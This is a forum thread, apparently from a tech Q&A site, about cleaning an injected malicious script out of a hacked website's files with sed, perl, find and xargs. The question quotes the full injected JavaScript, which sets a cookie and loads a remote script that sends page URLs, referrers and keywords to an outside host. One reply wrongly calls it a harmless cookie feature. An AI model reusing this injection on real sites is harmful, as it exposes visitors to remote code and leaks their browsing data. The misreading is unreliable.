Solved

Remove a very long string from all files in Linux

Posted on 2016-11-10
Last Modified: 2016-11-11
Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup.

I had the following idea.... All the files have the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

When I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and then somehow tell the system to remove said line from the file.

Any idea how I'd go about doing such a thing?
Question by:David Sankovsky
6 Comments
 
LVL 62

Expert Comment

by:gheist
ID: 41882333
Restore from backup and never ever let webserver modify content?
0
 
LVL 29

Accepted Solution

by:
serialband earned 500 total points
ID: 41882680
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, this will match the string and delete the entire line.  This outputs to stdout:
sed '/http:\/\/freedomfitnessandworkout\.com\/js\/jquery\.min\.php/d'  Matching_files
To send it to another file:
sed '/http:\/\/freedomfitnessandworkout\.com\/js\/jquery\.min\.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i '/http:\/\/freedomfitnessandworkout\.com\/js\/jquery\.min\.php/d'  Matching_files
0
 
LVL 78

Expert Comment

by:arnold
ID: 41882862
sed -i is a better approach compared to the /d since the string might not be the sole item on the line.

perl -pi.bak -e 's/pattern/replacementofany/g;' files
The -i.bak will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0

 
LVL 29

Expert Comment

by:serialband
ID: 41883250
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
LVL 78

Expert Comment

by:arnold
ID: 41883286
Serialband, I said that the sed -i was a better option versus /d.
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -i.bak; if not, it will also create a bak file.

To replace a pattern......

The entry seems to be a ColdFusion object; might the person have modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e., the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
LVL 7

Author Closing Comment

by:David Sankovsky
ID: 41883740
Well, the SED command was almost perfect; you all, however, missed my main question: how would I go about sending all the matched files to whatever cleaning tool I chose (sed, perl, or whatever)?

I eventually used "find" to make sure I don't accidentally send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0
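The find and xargs approach described in the closing comment, written out as an added example that is not part of the original thread. It assumes GNU find, grep, xargs and sed; the function names and the .infected backup suffix are hypothetical choices made for this example.

```shell
#!/bin/sh
# Marker taken from the injected <script> line quoted in the question.
MARKER='freedomfitnessandworkout.com/js/jquery.min.php'
# Same marker as a sed address, using | as the delimiter so the slashes
# need no escaping; dots are escaped so they match literally.
SED_ADDR='\|freedomfitnessandworkout\.com/js/jquery\.min\.php|d'

# clean_webroot DIR
# 1. find     lists regular files only, so directories never reach sed
# 2. grep -lF keeps just the files that contain the marker (fixed string)
# 3. sed -i   deletes every matching line, saving FILE.infected first
# NUL-separated names (-print0, -Z, -0) keep paths with spaces intact.
clean_webroot() {
    find "$1" -type f ! -name '*.infected' -print0 |
        xargs -0 -r grep -lZF -- "$MARKER" |
        xargs -0 -r sed -i.infected "$SED_ADDR"
}

# remaining DIR
# Prints how many files (backups excluded) still contain the marker,
# for checking the result before and after the cleanup.
remaining() {
    find "$1" -type f ! -name '*.infected' -print0 |
        xargs -0 -r grep -lF -- "$MARKER" |
        wc -l
}
```

The .infected copies still contain the injected line, so move them out of the web root once the cleaned files have been checked.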
